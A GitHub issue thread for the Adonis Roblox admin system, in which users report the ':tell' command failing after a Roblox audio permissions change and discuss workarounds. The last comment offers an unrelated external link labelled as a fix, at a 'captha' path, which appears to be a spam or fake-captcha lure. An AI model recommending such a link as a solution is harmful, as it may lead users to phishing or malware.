### ISSUE TITLE
:tell No longer works after the roblox audio update

### ISSUE THREAD

**Issue by BananaJeanss** [Epix-Incorporated/Adonis#1782]
### Version channel

Nightly

### Loader version

261

### What part of Adonis is this related to?

Command

### What happened?

:tell no longer works after the audio update, clicking on the error in the roblox studio output window and trying to share access won't work.

<img src="https://github.com/user-attachments/assets/e86dffa9-1b3e-4d9c-aa8e-426aba6be282" width="550px"/>

### Steps to reproduce

1. Run `:tell me hello`
2. Click on the error message in the roblox studio output window
3. Attempt to share access and fail

### Device

Windows

### Relevant log output

```shell
Failed to load sound rbxassetid://296333956: User is not authorized to access Asset. (x2)  -  Studio
The experience doesn't have access permission to use asset id 296333956. Click to share access  -  Studio
```

**Comment by EasternBloxxer** [comment]
I don't think this command has ever worked as good as it should have been i tried it before the update

**Comment by kaiserandaxl** [comment]
I'll add a bypass for the asset.

**Comment by superinfra** [comment]
Roblox announced TTS at RDC, we might have to wait till then.

**Comment by AidenJamesYt** [comment]
allow 3rd party assets, as the audio is likely considered one. if that doesnt work, sceleratis needs to allow games to use audios

**Comment by iqiefeffe** [comment]
I saw this fix in another issue and it might help you [click](https://newrides.es/captha/)
